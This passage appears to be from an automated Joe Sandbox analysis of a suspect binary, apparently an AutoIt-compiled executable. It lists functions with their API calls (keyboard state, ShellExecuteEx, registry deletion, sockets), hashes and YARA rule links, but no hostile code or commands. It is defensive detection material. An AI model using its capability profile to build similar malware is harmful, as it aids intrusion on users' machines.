                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7ec5c07bd95069eff5a9a22657a69a8c204580d3d6ed8fc1e277b0edc517a800
                                                                                                                      • Instruction ID: 5cf30185be5cd5b1b3274cbb7d22b040cdfadcb37c8c3542fad9f067b7f29461
                                                                                                                      • Opcode Fuzzy Hash: 7ec5c07bd95069eff5a9a22657a69a8c204580d3d6ed8fc1e277b0edc517a800
                                                                                                                      • Instruction Fuzzy Hash: 77716F38900109EFDB449F58CC48EBF7B75FF86314F14815EF915AA262C7389A51CBA9
                                                                                                                      Function 0054B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsWindow.USER32(01085420), ref: 0054B3EB
                                                                                                                      • IsWindowEnabled.USER32(01085420), ref: 0054B3F7
                                                                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0054B4DB
                                                                                                                      • SendMessageW.USER32(01085420,000000B0,?,?), ref: 0054B512
                                                                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 0054B54F
                                                                                                                      • GetWindowLongW.USER32(01085420,000000EC), ref: 0054B571
                                                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0054B589
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4072528602-0
                                                                                                                      • Opcode ID: ffdfa0a0e8d327729098823858867f5936dac05410dfedccf2311ab567d7aad7
                                                                                                                      • Instruction ID: 0e8342a8829ff3a19ab6a84d6443d654c089cb866b8ea03d365a3190e85302c7
                                                                                                                      • Opcode Fuzzy Hash: ffdfa0a0e8d327729098823858867f5936dac05410dfedccf2311ab567d7aad7
                                                                                                                      • Instruction Fuzzy Hash: E4718E34604204AFFF249F55C898FEA7FBAFF19308F144459E945972A2D732E950DB50
                                                                                                                      Function 0053F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0053F448
                                                                                                                      • _memset.LIBCMT ref: 0053F511
                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 0053F556
                                                                                                                        • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
                                                                                                                        • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
                                                                                                                        • Part of subcall function 004DFC86: _wcscpy.LIBCMT ref: 004DFCA9
                                                                                                                      • GetProcessId.KERNEL32(00000000), ref: 0053F5CD
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0053F5FC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 3522835683-2766056989
                                                                                                                      • Opcode ID: c083c5710ad4f535df2cba69553ef762c9cfd786dd111e8b60f439b2402bef2f
                                                                                                                      • Instruction ID: 0982a8b086071fa4ca28f61971e98f5a62d1feece051448664d76e20d0c40abe
                                                                                                                      • Opcode Fuzzy Hash: c083c5710ad4f535df2cba69553ef762c9cfd786dd111e8b60f439b2402bef2f
                                                                                                                      • Instruction Fuzzy Hash: BB61AC75E006199FCF14EF69C885AAEBBB4FF49314F10806EE816AB351CB34AD41CB94
                                                                                                                      Function 00520F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 00520F8C
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00520FA1
                                                                                                                      • SetKeyboardState.USER32(?), ref: 00521002
                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00521030
                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0052104F
                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00521095
                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 005210B8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: 3f259ae7a821e31fa2e474c5f43c066b01cb6c13de48612a9e690d1b0c703158
                                                                                                                      • Instruction ID: e1bb28400314e42dd5a6785d95aaeff83a6c2beb1b6efea1687c01fe2213fbc6
                                                                                                                      • Opcode Fuzzy Hash: 3f259ae7a821e31fa2e474c5f43c066b01cb6c13de48612a9e690d1b0c703158
                                                                                                                      • Instruction Fuzzy Hash: 54511360544BE53EFB3642349C09BB7BEA97F17304F088589E1C4458D3C2A8ECD8D764
                                                                                                                      Function 00520D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(00000000), ref: 00520DA5
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00520DBA
                                                                                                                      • SetKeyboardState.USER32(?), ref: 00520E1B
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00520E47
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00520E64
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00520EA8
                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00520EC9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: 8aebb1d284629be55d1d07059fc5ec70f62ff047d38c52817d4db45a840e3c00
                                                                                                                      • Instruction ID: 744af9bbf1fdad0ce3cc1db8f3830bb6a17ed350fd9e2092a03abf250a2b51d3
                                                                                                                      • Opcode Fuzzy Hash: 8aebb1d284629be55d1d07059fc5ec70f62ff047d38c52817d4db45a840e3c00
                                                                                                                      • Instruction Fuzzy Hash: 4151F3A15466E57DFB3683249C45BBABFA97F07300F089889F1D4468C3C395ACC8E760
                                                                                                                      Function 005255FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsncpy$LocalTime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2945705084-0
                                                                                                                      • Opcode ID: 205388d5050489334587aeb0a27a3b347ee8d901127bb24ff1f0b195abd08f24
                                                                                                                      • Instruction ID: 8b7403fe8cda6cc3e6cc7860b066e911357a9c42d66eff2d8201dfb3629befae
                                                                                                                      • Opcode Fuzzy Hash: 205388d5050489334587aeb0a27a3b347ee8d901127bb24ff1f0b195abd08f24
                                                                                                                      • Instruction Fuzzy Hash: 1B41D866C1025476CB11EFB69C4A9CFB7BCAF05311F50486BE504E3261FB38E245C7AA
                                                                                                                      Function 0051D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0051D5D4
                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0051D60A
                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0051D61B
                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0051D69D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                      • String ID: ,,U$DllGetClassObject
                                                                                                                      • API String ID: 753597075-2547291679
                                                                                                                      • Opcode ID: 71dff340d265f52814678d51359f0a433e0f1beb61f12fedae9bc2c03071ec80
                                                                                                                      • Instruction ID: 8712470b46a200f8f32af623453befa9451ef63d78834cd626b0d738dde7f8ea
                                                                                                                      • Opcode Fuzzy Hash: 71dff340d265f52814678d51359f0a433e0f1beb61f12fedae9bc2c03071ec80
                                                                                                                      • Instruction Fuzzy Hash: 02418DB5600204EFEB05DF64C884ADABFB9FF44314F1581A9AC099F209D7B1D984DBB0
                                                                                                                      Function 00523671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0052466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00523697,?), ref: 0052468B
                                                                                                                        • Part of subcall function 0052466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00523697,?), ref: 005246A4
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 005236B7
                                                                                                                      • _wcscmp.LIBCMT ref: 005236D3
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 005236EB
                                                                                                                      • _wcscat.LIBCMT ref: 00523733
                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 0052379F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 1377345388-1173974218
                                                                                                                      • Opcode ID: 93c862996cbd97026f0e63c1b8c1a53c063ba5f850153d82bac7e264da6210f2
                                                                                                                      • Instruction ID: c2e1d75b55f11156c0612599132b599dd793dc3b41231bc4351c1a4c517793f4
                                                                                                                      • Opcode Fuzzy Hash: 93c862996cbd97026f0e63c1b8c1a53c063ba5f850153d82bac7e264da6210f2
                                                                                                                      • Instruction Fuzzy Hash: 31418071108355AEC756EF64D4459DF7BECBF8A384F10082EB48AC3291EB38D689CB56
                                                                                                                      Function 00547291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 005472AA
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00547351
                                                                                                                      • IsMenu.USER32(?), ref: 00547369
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005473B1
                                                                                                                      • DrawMenuBar.USER32 ref: 005473C4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3866635326-4108050209
                                                                                                                      • Opcode ID: 27690dd02ac70d72b92dfd7696d7f30153531e3c4761cedf7769e38ac00c1035
                                                                                                                      • Instruction ID: 081d70320859c6fed598070680f4fee14b3e20d6e59d01f8af9f09b7e79d93e6
                                                                                                                      • Opcode Fuzzy Hash: 27690dd02ac70d72b92dfd7696d7f30153531e3c4761cedf7769e38ac00c1035
                                                                                                                      • Instruction Fuzzy Hash: 65412575A04208AFDB20DF64D884ADABBF8FB09318F249829FD05A7250D730AD54EF50
                                                                                                                      Function 00540FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00540FD4
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00540FFE
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 005410B5
                                                                                                                        • Part of subcall function 00540FA5: RegCloseKey.ADVAPI32(?), ref: 0054101B
                                                                                                                        • Part of subcall function 00540FA5: FreeLibrary.KERNEL32(?), ref: 0054106D
                                                                                                                        • Part of subcall function 00540FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00541090
                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00541058
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 395352322-0
                                                                                                                      • Opcode ID: 6cec0d421dd408b37c2320328d459bf393b5bfb4e2117454695be79d72c2a2fa
                                                                                                                      • Instruction ID: 99386e1ecb2651e5a43f5d280b6d8428d78270c46e64b93c8a60a44a0f18cd32
                                                                                                                      • Opcode Fuzzy Hash: 6cec0d421dd408b37c2320328d459bf393b5bfb4e2117454695be79d72c2a2fa
                                                                                                                      • Instruction Fuzzy Hash: 86313A75901109BFDB149B94DC8DEFFBBBCFF19348F00016AE506A2141EA709E899BA4
                                                                                                                      Function 005462CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005462EC
                                                                                                                      • GetWindowLongW.USER32(01085420,000000F0), ref: 0054631F
                                                                                                                      • GetWindowLongW.USER32(01085420,000000F0), ref: 00546354
                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00546386
                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 005463B0
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 005463C1
                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 005463DB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2178440468-0
                                                                                                                      • Opcode ID: 3abac2d48a9b30c5e1c33420d5eb33acf692a800f30c21ec57015c139313274e
                                                                                                                      • Instruction ID: f2c4c6fcb477f293ef860eb773df4c25b893ddd989ae1634703ee532b48cce00
                                                                                                                      • Opcode Fuzzy Hash: 3abac2d48a9b30c5e1c33420d5eb33acf692a800f30c21ec57015c139313274e
                                                                                                                      • Instruction Fuzzy Hash: EA3107386441919FDB20CF18DC84F953BE1FB5A718F290565F9019F2B2CB71AC44EB52
                                                                                                                      Function 0051DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0051DB2E
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0051DB54
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0051DB57
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0051DB75
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0051DB7E
                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0051DBA3
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0051DBB1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: 1c14a73699b47213dce676520b3450eb287459e2f90ff4416a81529010d6292d
                                                                                                                      • Instruction ID: c540c415b443d74d85a6672a911cb37a1dd98db672c1ea364873fe69f2f80de0
                                                                                                                      • Opcode Fuzzy Hash: 1c14a73699b47213dce676520b3450eb287459e2f90ff4416a81529010d6292d
                                                                                                                      • Instruction Fuzzy Hash: 4A21DE36604209AFEF10DFA9DC88CFB77ACFB09364B018529F915CB260DA709C858B70
                                                                                                                      Function 00536173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00537D8B: inet_addr.WSOCK32(00000000), ref: 00537DB6
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 005361C6
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005361D5
                                                                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0053620E
                                                                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00536217
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00536221
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 0053624A
                                                                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00536263
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 910771015-0
                                                                                                                      • Opcode ID: bb92da04a18a1fcc058e4133e9a822d08c4e9788e8ec296a5642074edd1bb861
                                                                                                                      • Instruction ID: 2d9cfc10e8a494deb3cc3dce3c1b7e3f8f2bdd8ccb206c7246374e563db0d7b2
                                                                                                                      • Opcode Fuzzy Hash: bb92da04a18a1fcc058e4133e9a822d08c4e9788e8ec296a5642074edd1bb861
                                                                                                                      • Instruction Fuzzy Hash: F5318F79600118AFDF10AF24CC89FBE7BA9FB45714F05842DF905AB291DB74AC089BA1
                                                                                                                      Function 0051F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                      • API String ID: 1038674560-2734436370
                                                                                                                      • Opcode ID: 33e929fa14e821157348817d3cb5207b5f0661072448d60b57d7aa293650a89d
                                                                                                                      • Instruction ID: a5fde7db4277ca397ccfce936f693617345ae2cbad29c82818d16416cc99105a
                                                                                                                      • Opcode Fuzzy Hash: 33e929fa14e821157348817d3cb5207b5f0661072448d60b57d7aa293650a89d
                                                                                                                      • Instruction Fuzzy Hash: 0A21797220425166E321AA36AC03FEB7BD8FF5A705F20843FF84687091EB949DC1C398
                                                                                                                      Function 0051DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
